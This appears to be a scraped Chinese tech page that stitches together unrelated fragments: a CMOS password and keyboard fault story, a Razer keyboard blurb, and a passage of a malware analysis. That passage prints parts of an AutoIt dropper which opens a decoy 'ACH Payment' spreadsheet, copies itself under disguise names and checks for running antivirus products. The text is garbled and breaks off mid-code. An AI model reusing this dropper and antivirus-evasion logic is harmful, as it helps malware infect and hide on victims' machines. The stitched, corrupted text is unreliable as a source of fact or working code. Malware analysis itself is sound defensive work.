Olydbg中代码如下图所示:
诊断:首先进入cmos,可cmos密码也进不去,我想这个人真恶毒啊,于是打开机箱放电,在bios里将启动优先设为rom,系统一气呵成,然后我重新设置了密码,重新启动后发现又不能进入,这时候我想到是不是键盘问题啊,可键盘指示灯一直亮着啊,那么按键会不会出现问题,于是我把键盘卸下安装到别的没有开机密码的电脑,在记事本中输入英文字母,发现键盘中标的字母在输出时出现乱码,问题迎韧而解。
雷蛇黑寡妇蜘蛛机械式键盘,采用一种独特的触觉回馈机械式按键架构,键盘上的每个按键都有清晰的触发反应与类似滑鼠点击时的触觉回馈,而独特的按键触发点设计,使其在一半键程时就会触发。
窗口和图形系统(windowing and graphic system )实现了图形用户界面(gui )函数(更为人们熟知的叫法是windows user和gdi 函数),比如对窗口的处理、用户界面控件,以及绘制等。
在while循环中,我们先是调用了acquirekey方法,这个方法将键盘输入信息进行缓冲以便逻辑中判断按键状态,下面讲会讲到键盘缓冲。
脚本为明文,基本上文件的功能一目了然。(晕啊,想起前面用olydbg动态调试的时候,层层的跳跃,快疯掉了。)
下面逐步分析该au3脚本的功能。
1、判断窗口是否存在
作用AutuIt脚本
2、释放打开excel文档
如果exe运行的名字不是system32.exe、swwin2.exe、svwin1.exe(用于判断是否是第一次打开),则释放xlsx文档并打开。这里我们可以看到脚本作者释放的excel文档名称就是%temp%\YZGZIG.lsx,与上文看到的一致,应该就是此处作者笔误,把YZGZIG.xls写成了YZGZIG.lsx。
序号AutuIt脚本
If @ScriptName <> “system32.exe” AND @ScriptName <> “svwin2.exe” AND @ScriptName <> “svwin1.exe” Then
FileInstall(“C:\Users\SHOZAB HAXOR\Desktop\ACH Payment.xlsx”, @TempDir & “/YZGZIG.lsx”)
ShellExecute(@TempDir & “/YZGZIG.lsx”)
EndIf
3、创建%appdata%\windata目录并拷贝自身到该目录下
序号AutuIt脚本
4、判断系统杀软环境
序号AutuIt脚本
Global $antivirus If ProcessExists(“ekrn。exe”) Then ???????????? $antivirus = “NOD32〃 ElseIf ProcessExists(“AvastUI。exe”) Then ???????????? $antivirus = “Avast” ElseIf ProcessExists(“avgcc。exe”) Then ???????????? $antivirus = “AVG” ElseIf ProcessExists(“avgnt。exe”) Then ???????????? $antivirus = “Avira” ElseIf ProcessExists(“ahnsd。exe”) Then ???????????? $antivirus = “AhnLab-V3〃 ElseIf ProcessExists(“bdss。exe”) Then ???????????? $antivirus = “BitDefender” ElseIf ProcessExists(“bdv。exe”) Then ???????????? $antivirus = “ByteHero” ElseIf ProcessExists(“clamav。
本文来自电脑杂谈,转载请注明本文网址:
http://www.pc-fly.com/a/jisuanjixue/article-90405-4.html
我们真的倒退100年